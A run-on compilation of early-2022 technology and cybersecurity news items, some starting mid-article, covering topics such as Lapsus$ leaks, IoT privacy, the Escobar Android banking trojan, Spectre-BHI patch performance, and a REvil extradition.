“One unusual tendency of Lapsus$ is their use of Telegram to broadcast victims’ identities,” Digital Shadows' Peh says. “Abusing a legitimate tool like Telegram ensures Lapsus$’s data leak channel will see minimum disruption, and that their victims’ identities can be exposed to anyone with an internet connection.”

One of Lapsus$'s trademark antics is to run polls on its Telegram channel where onlookers can vote for whose data the gang should publish next.

“It’s very reminiscent of the Lulzsec folks and even Anonymous back in the day,” Mandiant's Carmakal says of the two hacktivist collectives that rose to prominence in the early 2010s. “Those folks had political motivations, or pretended to, but were also doing it for the fame and glory, and Lulzsec in particular was more overt about doing it for fun. With Lapsus$ it's a very dangerous thing for people to do for fun, and they will be arrested at some point in time.”

In the meantime, though, the question for Big Tech is, who will be in Lapsus$'s crosshairs next? It seems that no target is too big or influential to be out of reach—and that the demands may be just as hard to predict.

The Lapsus$ Hacking Group Is Off to a Chaotic Start

(May require free registration to view)

Depending on where you were, though, you might not have been completely imagining it. There are billions of things sensing you every day. They are everywhere, hidden in plain sight – inside your TV, fridge, car and office. These things know more about you than you might imagine, and many of them communicate that information over the internet.

Back in 2007, it would have been hard to imagine the revolution of useful apps and services that smartphones ushered in. But they came with a cost in terms of intrusiveness and loss of privacy.

As computer scientists who study data management and privacy, we find that with internet connectivity extended to devices in homes, offices and cities, privacy is in more danger than ever.

Internet of Things

Your appliances, car and home are designed to make your life easier and automate tasks you perform daily: switch lights on and off when you enter and exit a room, remind you that your tomatoes are about to go bad, personalize the temperature of the house depending on the weather and preferences of each person in the household.

To do their magic, they need the internet to reach out for help and correlate data. Without internet access, your smart thermostat can collect data about you, but it doesn't know what the weather forecast is, and it isn't powerful enough to process all of the information to decide what to do.

But it's not just the things in your home that are communicating over the internet. Workplaces, malls and cities are also becoming smarter, and the smart devices in those places have similar requirements.

In fact, the Internet of Things (IoT) is already widely used in transport and logistics, agriculture and farming, and industry automation. There were around 22 billion internet-connected devices in use around the world in 2018, and the number is projected to grow to over 50 billion by 2030.

What these things know about you

Smart devices collect a wide range of data about their users. Smart security cameras and smart assistants are, in the end, cameras and microphones in your home that collect video and audio information about your presence and activities.

On the less obvious end of the spectrum, things like smart TVs use cameras and microphones to spy on users, smart lightbulbs track your sleep and heart rate, and smart vacuum cleaners recognize objects in your home and map every inch of it.

Sometimes, this surveillance is marketed as a feature. For example, some Wi-Fi routers can collect information about users' whereabouts in the home and even coordinate with other smart devices to sense motion.

Manufacturers typically promise that only automated decision-making systems and not humans see your data. But this isn't always the case. For example, Amazon workers listen to some conversations with Alexa, transcribe them and annotate them, before feeding them into automated decision-making systems.

But even limiting access to personal data to automated decision making systems can have unwanted consequences. Any private data that is shared over the internet could be vulnerable to hackers anywhere in the world, and few consumer internet-connected devices are very secure.

Understand your vulnerabilities

With some devices, like smart speakers or cameras, users can occasionally turn them off for privacy. However, even when this is an option, disconnecting the devices from the internet can severely limit their usefulness.

You also don't have that option when you're in workspaces, malls or smart cities, so you could be vulnerable even if you don't own smart devices.

Therefore, as a user, it is important to make an informed decision by understanding the trade-offs between privacy and comfort when buying, installing and using an internet-connected device.

This is not always easy. Studies have shown that, for example, owners of smart home personal assistants have an incomplete understanding of what data the devices collect, where the data is stored and who can access it.

Governments all over the world have introduced laws to protect privacy and give people more control over their data. Some examples are the European General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA).

Thanks to this, for instance, you can submit a Data Subject Access Request (DSAR) to the organization that collects your data from an internet-connected device. The organizations are required to respond to requests within those jurisdictions within a month explaining what data is collected, how it is used within the organization and whether it is shared with any third parties.

Limit the privacy damage

Regulations are an important step; however, their enforcement is likely to take a while to catch up with the ever-increasing population of internet-connected devices. In the meantime, there are things you can do to take advantage of some of the benefits of internet-connected without giving away an inordinate amount of personal data.

If you own a smart device, you can take steps to secure it and minimize risks to your privacy.

The Federal Trade Commission offers suggestions on how to secure your internet-connected devices. Two key steps are updating the device's firmware regularly and going through its settings and disabling any data collection that is not related to what you want the device to do. The Online Trust Alliance provides additional tips and a checklist for consumers to ensure safe and private use of consumer internet-connected devices.

If you are on the fence about purchasing an internet-connected device, find out what data it captures and what the manufacturer's data management policies are from independent sources such as Mozilla's Privacy Not Included. By using this information, you can opt for a version of the smart device you want from a manufacturer that takes the privacy of its users seriously.

Last but not least, you can pause and reflect on whether you really need all your devices to be smart. For example, are you willing to give away information about yourself to be able to verbally command your coffee machine to make you a coffee?

Source

"In the past few hours, a DDoS attack against a communications provider was identified," the Israel National Cyber Directorate (INCD) said in a tweet. "As a result, access to several websites, among them government websites, was denied for a short time. As of now, all of the websites have returned to normal activity."

A distributed denial-of-service attack is a malicious attempt to hamper the normal traffic of a targeted server or service by overwhelming the victim and its surrounding infrastructure with a flood of junk internet traffic by leveraging compromised computers and IoT devices as sources of attack traffic.

The development comes after internet watchdog NetBlocks reported "significant disruptions" registered on multiple networks supplied by Israel's telecom providers Bezeq and Cellcom.

The INCD has not pinned the attacks to a specific threat actor, but Jerusalem Post alluded to the possibility that the incident could have been the work of an Iranian-affiliated hacker group in retaliation for alleged attempted sabotage of the nation's Fordow nuclear enrichment plant.

This is not the first time DDoS attacks have been mounted against government IT infrastructure, what with the ongoing Russo-Ukrainian war paving the way for a series of "tit-for-tat" DDoS attack campaigns on both sides.

On top of that, a vulnerability in Mitel MiCollab and MiVoice Business Express collaboration systems was recently weaponized to carry out sustained distributed denial-of-service (DDoS) attacks for up to 14 hours with a record-breaking amplification ratio of 4.3 billion to 1.

Source

The alleged NSA spy tool is capable of lurking in a victim's computer and access sensitive information, according to the Chinese outlet Global Times.

The US National Security Agency have not confirmed or commented on the alleged hacking claims

Credit: AFP - Getty

A report obtained by the outlet from National Computer Virus Emergency Response Center claims the dubbed Trojan horse, or NOPEN, is a remote control tool for Unix/Linux computer systems.

The instrument can allegedly remotely control existing network servers and terminals, which attackers can manually implant, or cyberattack platforms by the NSA, the outlet reported citing the NCVERC report.

According to the Chinese outlet, the tool is "mainly used to steal files, access systems, redirect network communication, and view a target device's information."

The spy system has reportedly controlled global internet equipment and stole large amounts of users' information.

Cybersecurity experts told the outlet that once the Trojan is planted into a victim's computer, it would "become a 'lurker' waiting for the 'code' and opening the 'vault door' for hackers."

The tool can also allegedly turn a victim's computer into a bridge tower, allowing hackers to go deeper into the group where the victim works and grasp the company's information.

The Trojan horse is allegedly one of the most potent weapons used by the NSA's Tailored Access Operations (TAO) to attack and steal secrets, the outlet reported citing internal NSA documents leaked by the hacking group Shadow Brokers.

Despite the claims, there has been no confirmation by US officials on the alleged hack or of the tool's existence.

The NSA did not immediately respond to a request for comment from The US Sun.

Source

Google is being sued by a Florida restaurant group alleging that the tech company has been setting up unauthorized pages to capture food orders rather than directing them to the restaurant’s own site.

Google uses “bait-and-switch” tactics to get customers to place takeout or pickup orders through “new, unauthorized, and deceptively branded webpages,” according to the lawsuit, filed on behalf of Left Field Holdings, a restaurant company that runs Lime Fresh Mexican Grill franchises. On those pages, customers are prompted with large buttons to order with food delivery companies like GrubHub, DoorDash, or Seamless.

“Google never bothered to obtain permission from the restaurants to sell their products online,” the lawsuit says. “Google purposefully designed its websites to appear to the user to be offered, sponsored, and approved by the restaurant, when they are not—a tactic, no doubt, employed by Google to increase orders and clicks.”

In a statement to Ars, Google disputed “the mischaracterizations of our product” and said it would be defending itself against the lawsuit. “Our goal is to connect customers with restaurants they want to order food from and make it easier for them to do it through the ‘Order Online’ button,” spokesperson José Castañeda told Ars. “We provide tools for merchants to indicate whether they support online orders or prefer a specific provider, including their own ordering website. We do not receive any compensation for orders or integrations with this feature.”

Google acquisition

The “Oder Online” button appears to be the result of a Google acquisition known as “The Ordering App,” a site that was originally marketed toward restaurants. “The Ordering app is an online ordering platform, powered by Google, and designed specifically for Restaurants to help customers order more seamlessly from the Google Business Profile,” the product’s Salesforce page says. While The Ordering App was initially set up to take a percentage of sales, Google waived it “to help support restaurants affected during the COVID-19 pandemic.”

It’s not clear when The Ordering App or the “Order Online” button changed tack or if it ever did—there’s very little information about the acquisition or the product that’s public—but the lawsuit alleges that at some point Google decided to market it to food delivery companies instead of restaurants.

Before the “Order Online” button appeared, Google search result pages for restaurant queries looked like many others do—a list of organic results accompanied by text ads. Then, in 2019, Google started rolling out the new button, which appears prominently in what the company calls the Business Profile, a collection of information about a business that appears alongside search results.

When users click the “Order Online” button, they’re directed to a page that in many cases contains large links to food delivery companies, complete with their logos. The restaurant’s own site gets a link as well, though it’s a small, generic “website” button. In some cases, Google provides an interface for assembling an order, complete with prices and descriptions of the menu items.

Companies that have completed the “Order Online” setup with Google can also direct customers to their own online ordering services. Yet because many restaurants’ ordering sites are run by third parties, those links may not contain a restaurant’s name. In the case of Cambridge, Massachusetts, cafe Flour Bakery, for example, the option to order directly appears as “thelevelup.com”.

If restaurants haven’t completed the setup, Google appears to create a page anyway. It’s unclear how that happens, though it’s possible that a restaurant’s appearance in a delivery app is what triggers it. That isn’t always a sign of a business relationship between the restaurant and food delivery company, though. Many food delivery companies have been sued for adding restaurants without their consent.

“Google’s ‘Order Online’ button leads to an unauthorized online storefront—one owned and controlled by Google—wherein consumers can place orders for the restaurant’s products, all under the restaurant’s tradename,” the lawsuit says. “Google prominently features the restaurant’s tradename at the top of the page, above the restaurant’s address and menu, to give the user the distinct impression that the storefront and products are authorized and sponsored by the restaurant, when they are not.”

Food delivery app fees

If the restaurant has a relationship with the food delivery company, it gets charged a fee. These fees can be so high—15 to 30 percent in many cases—that the restaurant has no hope of making a profit from the order. “A restaurant's motivation to partner with a Delivery Provider is almost never to make a profit on orders received from the Delivery Provider,” the complaint says. “Rather, a restaurant’s usual goal is to capture new customers that may later place orders with the restaurant outside of the Delivery Providers’ expensive platforms.”

But, the lawsuit says, because of the way Google’s “Order Online” feature is designed, it limits restaurants’ chances of taking orders directly.

Given the number of restaurants in the US, the lawyers representing Left Field Holdings are seeking class action, saying they believe there are “tens of thousands” of potential plaintiffs. “Since launching its unauthorized Storefront, Google has hijacked millions of customers and orders,” the lawsuit alleges.

Source

Launched in August 20202, Firefox Relay was introduced as a free service available on a website and as a Firefox extension. Users who signed up for it with a Firefox account could set up email forwards for existing email addresses using aliases provided by the service. Emails would go through the Firefox Relay service, which meant that senders would communicate with the Firefox Relay alias address and not the user's "real" email address.

Mozilla launched Firefox Relay Premium in November 2021. The subscription-based services unlocked several restrictions of the free plan, including the ability to reply to forwarded emails, use custom email domains, and use unlimited aliases instead of the 5 that the free plan offered.

The March 2022 Firefox Relay update improves the service in key areas. One of the big improvement increases the supported attachment size for all plans to 10 Megabytes. The previous limit of 150 Kilobytes blocked larger attachments from reaching the user's inbox. 10 Megabytes is still less than the usual 20-25 attachment size limits of email services.

Another new feature introduced in the update is the ability to filter promotional emails. Premium Firefox Relay users may block some or all promotional messages from a site now. The new filter options complements the "none" and "all" options that Firefox Relay supports. Mozilla notes that the blocking may not be 100% accurate, as non-promotional emails may be blocked by the service. The organization recommends that important senders are not blocked using the functionality, as blocked emails can't be recovered. An option to recover blocked emails would probably have been a better option.

Last but not least, Firefox Relay is now also available as a browser extension for Google Chrome and other Chromium-based browsers. The extension for the service improves its usability. Users may add Firefox Relay aliases quickly to sign-up forms and other email forms to use it without having to copy and paste addresses manually.

Closing words

The March 2022 improvements are beneficial to free and premium users. Free users benefit from the increased attachment size limit, premium users get an option to block promotional emails on top of that.

The service has a long way to go functionality-wise, especially when compared to established services such as Simple Login.

Now you: do you use email forwarding services?

Firefox Relay update brings larger attachment sizes and a filter for promotional emails

However, a Redditor with the username ArmoredCavalry observed that their router, a TP-Link Archer AX3000, was sending loads of their data to the Avira SafeThings servers. The Redditor says that in 24 hours, more than 80,000 requests were made. They write:

I recently enabled a DNS gateway to be able to see requests from my router, and network devices. Was surprised to find 80K + requests (in 24 hours) out to an Avira "Safe Things" subdomains *.safethings.avira.com (far more than any other server).

For those wondering, SafeThings is a cloud-based threat intelligence platform that analyses user traffic. Here's how Avira defines SafeThings:

Avira SafeThings is a cloud-based behavioral threat intelligence platform which interfaces with a service provider’s home router. It enables a connected home to operate securely without fear of compromised IoT devices. Service providers benefit from comprehensive report management options though the SafeThings Insights and Management Centre API. Consumers gain visibility and complete control over their home devices through a custom developed mobile app.

While Avira does say that users will be in control over their devices, the Redditor claims that the service continues to run on its own even though they haven't subscribed to it and all such related options are disabled on their device. The user writes:

I have the Avira / Home Shield services completely turned off (I wasn't even subscribed to their paid service for it). The router doesn't care, and sends ALL your traffic to be "analyzed" anyhow.

Interestingly, this behavior was already confirmed earlier by XDA which found that the TP-Link Deco X68 was exhibiting this problem as it was sending out data even when the service was disabled. TP-Link said at the time that a future firmware would fix the issue but XDA was seemingly not made aware of such an event.

The XDA review says:

TP-Link says the network activity is due to “the Avira cloud data base [distinguishing] whether [the network request is] secure data or malware.” A firmware update is in the works that will turn this functionality off if no Avira network features are enabled in the app, but there is no estimated timeline for that yet.

If you wish to check if your own TP-Link routers exhibit such behavior, you can use a DNS Gateway to observe it.

Source: ArmoredCavalry (Reddit) via XDA

Beware: TP-Link routers apparently sending customer data to Avira without user consent

In the settlement, TorGuard has agreed to block BitTorrent traffic for its users.

TorGuard VPN to block torrents using firewall

Last year, over two dozen film studios had sued TorGuard, claiming the VPN provider maintained no logs and encouraged online piracy through its marketing efforts.

The same set of plaintiffs had earlier demanded $10 million in "damages" from another log-less VPN provider, LiquidVPN.

According to court documents obtained by BleepingComputer, both the film studios and VPNetworks, LLC  d.b.a. TorGuard, have now agreed to reach a settlement in which the VPN provider will block torrents on its network.

TorGuard will "use commercially reasonable efforts to block BitTorrent traffic on its servers in the United States using firewall technology," reveal the documents.

TorGuard blames host for ignoring over 100,000 piracy notices

Since June 2012, TorGuard had been leasing servers and IP addresses from hosting provider QuadraNet, until late 2021 when the VPN provider notified QuadraNet that it was terminating the service.

Some of these servers were used by TorGuard to offer SOCKS5 proxy services to its customers.

TorGuard's Knowedgebase (KB) had detailed instructions on how its proxy servers could be configured by customers to work with existing BitTorrent clients: 

Note, unlike with VPNs, traffic routed through SOCKS5 proxy servers is by default unencrypted, making it possible for intermediary hosting providers to gain visibility into the network flows, should they choose to.

Records produced by the film studios show that 97,640 copyright infringement notices were sent to QuadraNet confirming instances of piracy at the SOCKS5 IPs assigned to TorGuard.

An additional, 47,219 notices confirmed piracy associated with other TorGuard IP addresses, through November 2021.

Plaintiffs' attorneys shared an Excel spreadsheet with TorGuard showing 250,000 "hit dates of confirmed infringement." Of these records, about 40% of copyright infringement instances were associated with one SOCKS5 IP address alone that had been provisioned to TorGuard.

"Because traffic on TorGuard’s SOCKS5 proxy servers is not encrypted,... QuadraNet could have used conventional network monitoring tools to capture data packets of the piracy and confirm the piracy in the notices plaintiffs sent to QuadraNet," argue the plaintiffs' lawyers.

The film studios further argue that network monitoring technologies like deep packet inspection could have been used to respond to piracy notices and block infringing flows.

TorGuard has blamed the mishap on its hosting provider, QuadraNet for failing to timely forward copyright violation notices to TorGuard's registered DMCA agent.

"TorGuard values intellectual property rights of others, as stated in TorGuard's publicly posted policies. Had QuadraNet sent these notices to our DMCA agent, TorGuard's ordinary business practices would have been to immediately take steps to stop further piracy."

When TorGuard notified QuadraNet that it was terminating its relationship with the hosting provider, "Quadranet tried to persuade TorGuard to continue service by offering different terms," state the court documents.

It is a common practice in the hosting industry for a provider to "null route" a subscriber's IP address, effectively terminating a network connection, where it has received multiple notices of copyright infringement associated with an IP address.

"If QuadraNet had null routed one of the IP addresses assigned to TorGuard where plaintiffs sent notices or at least forwarded the notices to TorGuard's DMCA agent, TorGuard would have taken immediate steps to stop further piracy such as suspending users and adopting a firewall to filter out BitTorrent traffic as it has now begun to do," explains the VPN provider.

In September 2021, the same group of film studios had sued QuadraNet for not null-routing infringing VPN IPs. Luckily though, the plaintiff's earlier complaint centered around VPN (encrypted) traffic and made no mention of SOCKS5 proxies.

As such, the court had to dismiss the lawsuit and side with QuadraNet who claimed it had no visibility into encrypted VPN traffic and "was never aware of the end users' online activity" on its servers.

VPN provider bans BitTorrent after getting sued by film studios

The new features in the latest Aberebot version also include taking control of the infected Android devices using VNC, recording audio, and taking photos, while also expanding the set of targeted apps for credential theft.

The main goal of the trojan is to steal enough information to allow the threat actors to take over victims' bank accounts, siphon available balances, and perform unauthorized transactions.

Rebranded as Escobar

Using KELA's cyber-intelligence DARKBEAST platform, BleepingComputer found a forum post on a Russian-speaking hacking forum from February 2022 where the Aberebot developer promotes their new version under the name 'Escobar Bot Android Banking Trojan.'

The malware author is renting the beta version of the malware for $3,000 per month to a maximum of five customers, with threat actors having the ability to test the bot for free for three days.

The threat actor plans on raising the malware's price to $5,000 after development is finished.

MalwareHunterTeam first spotted the suspicious APK on March 3, 2022, masqueraded as a McAfee app, and warned about its stealthiness against the vast majority of anti-virus engines.

This was picked up by researchers at Cyble, who performed an analysis of the new 'Escobar' variant of the Aberebot trojan.

According to the same analysts, Aberebot first appeared in the wild in the summer of 2021, so the appearance of a new version indicates active development.

Old and new capabilities

Like most banking trojans, Escobar displays overlay login forms to hijack user interactions with e-banking apps and websites and steal credentials from victims.

The malware also packs several other features that make it potent against any Android version, even if the overlay injections are blocked in some manner.

The authors have expanded the set of targeted banks and financial institutions to a whopping 190 entities from 18 countries in the latest version.

The malware requests 25 permissions, of which 15 are abused for malicious purposes. Examples include accessibility, audio record, read SMS, read/ write storage, get account list, disabling the keylock, making calls, and accessing precise device location.

Everything that the malware collects is uploaded to the C2 server, including SMS call logs, key logs, notifications, and Google Authenticator codes.

The above is enough to help the crooks overcome two-factor authentication obstacles when assuming control of e-banking accounts.

2FA codes arrive via SMS or are stored and rotated in HMAC software-based tools like Google's Authenticator. The latter is considered safer due to not being susceptible to SIM swap attacks, but it's still not protected from malware infiltrating the userspace.

Moreover, the addition of VNC Viewer, a cross-platform screen sharing utility with remote control features, gives the threat actors a new powerful weapon to do whatever they want when the device is unattended.

Apart from the above, Aberebot can also record audio clips or take screenshots and exfiltrate both to the actor-controlled C2, with the complete list of supported commands listed below.

Should we be concerned?

It is still early to tell how popular the new Escobar malware will become in the cybercrime community, especially at a relatively high price. Nevertheless, it's now powerful enough to entice a wider audience.

Also, its operational model, which involves random actors that can rent it, means its distribution channels and methods may vary greatly.

In general, you can minimize the chances of being infected with Android trojans by avoiding the installation of APKs outside of Google Play, using a mobile security tool, and ensuring that Google Play Protect is enabled on your device.

Additionally, when installing a new app from any source, pay attention to unusual requests for permissions and monitor the app's battery and network consumption stats for the first few days to identify any suspicious patterns.

Android malware Escobar steals your Google Authenticator MFA codes

Ubisoft experienced a “cyber security incident” last week that temporarily disrupted some games, systems, and services, the company reported Thursday. Ubisoft hasn’t said who might be responsible, but on Friday evening, the group who purportedly hacked Nvidia took credit.

Ubisoft said it believes that “at this time there is no evidence any player personal information was accessed or exposed as a by-product of this incident” and says that games and services are now “functioning normally.” Out of caution, the company also “initiated a company-wide password reset.” When asked for comment, Ubisoft spokesperson Jessica Roache said the company had no additional details to share.

News of the incident arrives amid a recent wave of high-profile hacks. Nvidia confirmed on March 1st that it was hacked and said that the hackers are leaking employee credentials and proprietary information. Samsung said on March 7th that hackers stole internal company data and source code for Galaxy devices. The LAPSUS$ hacking group has taken responsibility for those two breaches.

But that may not be all. On Friday, in a Telegram channel allegedly run by LAPSUS$, the group posted a link to this article and the smirking face emoji, seemingly taking responsibility for the Ubisoft incident, too. In response to a user in the channel, the group “confirmed” that it did not target Ubisoft’s customer information. Ubisoft didn’t immediately reply to a request for comment on the claims.

 Here is a screenshot sent by a tipster of the Telegram channel. The Verge separately saw the messages in the channel as well.

Update March 11th, 7:36PM ET: Added that a group allegedly representing LAPSUS$ is taking credit.

Ubisoft says it experienced a ‘cyber security incident’, and the purported Nvidia hackers are taking credit

The Spectre vulnerability in general exploits CPUs that use branch prediction or speculation, and VUSec notes that this new threat can even circumvent Enhanced Indirect Branch Restricted Speculation (EIBRS) hardware mitigations (or CSV2 in the case of ARM) by using branch history buffer (BHB). Hence, the new variant is called Spectre-BHB or Branch History Injection (BHI).

Consequently, Linux security patches for x86 processors were also released on the same day and added to the Linux 5.17 mainline kernel. As such, Phoronix decided to test the patch on a couple of Intel processors to see the performance impact that it can have.

First, we have the latest 12th Gen Alder Lake-S Core i9-12900K and the processor loses up to 26.7% performance when measuring the Sockperf throughput. Other than this, the i9-12900K loses anywhere between 2 to 14.5% with the Spectre-BHB patch.

An 11th Gen Tiger Lake Core i7-1185G7 processor was also tested and this time the maximum loss is even greater as an unpatched system performed up to 35.6% better. In another test, the unpatched system was 34.1% faster. Overall, other than these two tests, the unpatched system lost anywhere between 2% to 26.1% performance.

Interestingly, as you can see in the case of the Selenium benchmark, the i7-1185G7 actually gained a little performance (2.2%) on the patched machine.

You can read about the full test setup and such in the original Phoronix article linked at the source below.

Source and images: Phoronix

Even modern Intel CPUs are losing up to 36% performance with the new Spectre BHI patch

WhatsApp users have several options when it comes to signing in to the service and starting to communicate with individuals and via groups. Besides using mobile devices running Android or iOS, WhatsApp users may also use WhatsApp Desktop, a Windows 10 and 11 application, and WhatsApp Web, a web-based version of the messaging service.

Code Verify is an open source extension that "confirms that your WhatsApp Web code hasn't been tampered with or altered, and that the WhatsApp Web experience you're getting is the same as everyone else's" according to the description on GitHub.

Meta promises that the extension does not log "any data, metadata, or user data" and that it "does not share any information with WhatsApp". Messages are not read or accessed and neither Meta nor WhatsApp will know if Code Verify is being used in the browser. Code Verify's sole purpose is to verify the integrity of WhatsApp Web to ensure that the site is secure to use.

The extension checks the integrity of the WhatsApp Web service when users connect to it using a browser the extension is installed in. It displays a green, orange or red icon that indicates whether WhatsApp Web has been validated successfully, code integrity checking failed, or validation failed.

WhatsApp users known immediately if something is wrong if the icon turns orange or red when they are connecting to WhatsApp Web.

Code Verify will run immediately, and if the WhatsApp Web code is fully validated, the Code Verify icon in the browser will appear green.

If the Code Verify icon appears orange, it means that you need to refresh your page or another browser extension is interfering with Code Verify. In this instance, Code Verify will recommend that you pause your other browser extensions.

If the Code Verify icon appears red, it will indicate that there is a possible security issue with the WhatsApp Web code you’re being served.

Meta released Code Verify as open source to increase user trust in the extension, improve its own security and giving other developers the opportunity to fork the extension to use it for their own projects in a similar manner.

Interested users may download the Chrome and Edge extension from the official extension stores. The Firefox version has not been released yet.

Now You: do you use WhatsApp Web or WhatsApp? Would you use Code Verify?

Meta releases Code Verify extension for WhatsApp Web

Microsoft Pluton doesn’t “align” with Dell’s hardware security strategy

1Password has announced that it has increased its top bug bounty reward for finding potential security flaws in its password manager to $1m.

Not only is the highest bounty in the history of the IT security company Bugcrowd but it's also one of the largest rewards in the industry.

CEO of 1Password, Jeff Shiner explained in a press release how the move will attract additional security experts and white hat hackers while also strengthening the security of its password manager, saying:

"No one should have to choose between safety and convenience, and we're making this major investment to demonstrate our commitment to keeping 1Password customers secure. Increasing our bug bounty to $1 million will attract another layer of outside expertise to make sure our systems are as secure as possible. Together, we will deepen our security leadership so our customers can live their lives online with ease and confidence."

Strengthening its platform

1Password regularly engages both external security experts and white hat hackers as part of its normal day-to-day operations in an effort to discover any blind spots in its platform. By expanding its bug bounty program though, the company will be able to enlist thousands of researchers to continue these efforts.

Since starting its bug bounty program back in 2017, 1Password has paid out $103k to Bugcrowd researchers with an average bounty of $900. Although all of the bugs detected so far have been minor and didn't put any sensitive customer data at risk, the company was able to resolve them quickly which also helped reduce the risk of attacks.

Besides its bug bounty program, 1Password conducts over a dozen external penetration tests annually and releases the results to the public. However, the company also has a Security Ambassador Program to train and develop security expertise in its development teams as well as an Eyes of the Month program that rewards employees who report the most impactful security issue of the month.

Security researchers and others interested in getting started with the 1Password bug bounty program can visit the company's site or its Bugcrowd page.

1Password ups maximum bug bounty to a cool $1,000,000

Vasinkyi, a 22-year-old Ukrainian national, was arrested in November 2021 while entering Poland for his cybercrime activities as a REvil member.

Vasinkyi is believed to be a REvil ransomware affiliate tasked to breach corporate networks worldwide, steal unencrypted data, and then encrypt all of the devices on the network.

Shortly after Vasinkyi was arrested, the DOJ announced that he was responsible for the ransomware attack against Kaseya, a managed services provider, impacting thousands of companies worldwide.

“In the alleged attack against Kaseya, Vasinskyi caused the deployment of malicious Sodinokibi/REvil code throughout a Kaseya product that caused the Kaseya production functionality to deploy REvil ransomware to “endpoints” on Kaseya customer networks,” explained the U.S. DoJ announcement.

“After the remote access to Kaseya endpoints was established, the ransomware was executed on those computers, which resulted in the encryption of data on computers of organizations around the world that used Kaseya software.”

The REvil operation (aka Sodinokibi) demanded $70 million for a decryption key to decrypt all of Kaseya’s affected customers. However, the FBI received the decryption key after a law enforcement operation gained access to the ransomware operation’s servers.

Vasinskyi is believed to be one of REvil’s long-term affiliates, taking part in at least nine confirmed ransomware attacks against companies in the U.S.

The indictment that was unsealed following his arrest substantiates eleven counts, linking them to distinct attacks against North American firms.

The charges that Vasinskyi is facing now for his actions are the following:

• Conspiracy to commit fraud and related activity in connection with computers
• Intentional damage to protected computers
• Conspiracy to commit money laundering

If convicted for all counts, Vasinskyi will be sentenced to a total of 115 years in prison. Additionally, he will also forfeit all property and financial assets.

MSPs targeted by ransomware in the past

Managed Service Providers use specialized software to remotely manage their customers’ networks, including pushing out patches, performing remote support, and managing the Windows domain.

Since the launch of the GandCrab ransomware operation and its successor, REvil, an affiliate has consistently shown expertise in MSP platforms by using them to encrypt targeted MSPs’ customers.

This expertise has led to successful attacks against managed service providers using the specialized software they use, including the Kaseya, ConnectWise, and WebRoot MSP platforms.

The Kaseya attack used previously unknown zero-day vulnerabilities and intimate knowledge on how the systems work, possibly indicating that this same affiliate was behind this attack as well.

If Vasinskyi is this affiliate, his arrest, and potential imprisonment are a boon to the MSP industry, which now has one less threat actor to worry about.

REvil in limbo

The case of Vasinkyi is a success for the U.S. judiciary and law enforcement, especially considering that Ukraine currently has no extradition treaty with the United States.

However, he is only one of the numerous REvil affiliates and almost certainly not part of the core team of the notorious RaaS (ransomware as a service) gang.

On November 4, 2021, two suspected REvil affiliates were arrested in Romania and Kuwait in an international law enforcement action coordinated by Europol and Interpol.

On January 15, 2022, the Federal Security Service (FSB) announced the arrest of fourteen suspected members of REvil, yet the leading operators are still assumed to be free.

While the REvil ransomware operation is shut down, it would not be surprising to see its core members or affiliate rebrand as a new operation in the future.

REvil ransomware member extradited to U.S. to stand trial for Kaseya attack

At the time of writing, the poll had received 12,700 votes and CNBC says that Vodafone was leading with 56%. For obvious reasons, we’re not going to link to the poll but if you do manage to find it then it’s probably not a good idea to interact with it given that Vodafone could get law enforcement involved as a result.

Speaking to CNBC, Vodafone said:

“We are investigating the claim together with law enforcement, and at this point we cannot comment on the credibility of the claim. However, what we can say is that generally the types of repositories referenced in the claim contain proprietary source code and do not contain customer data.”

The threat to dump Vodafone’s confidential code comes just days after the group released 190 GB of Samsung’s code online. It has also been targetting NVIDIA.

Lapsus$ hackers threatening to release Vodafone's proprietary code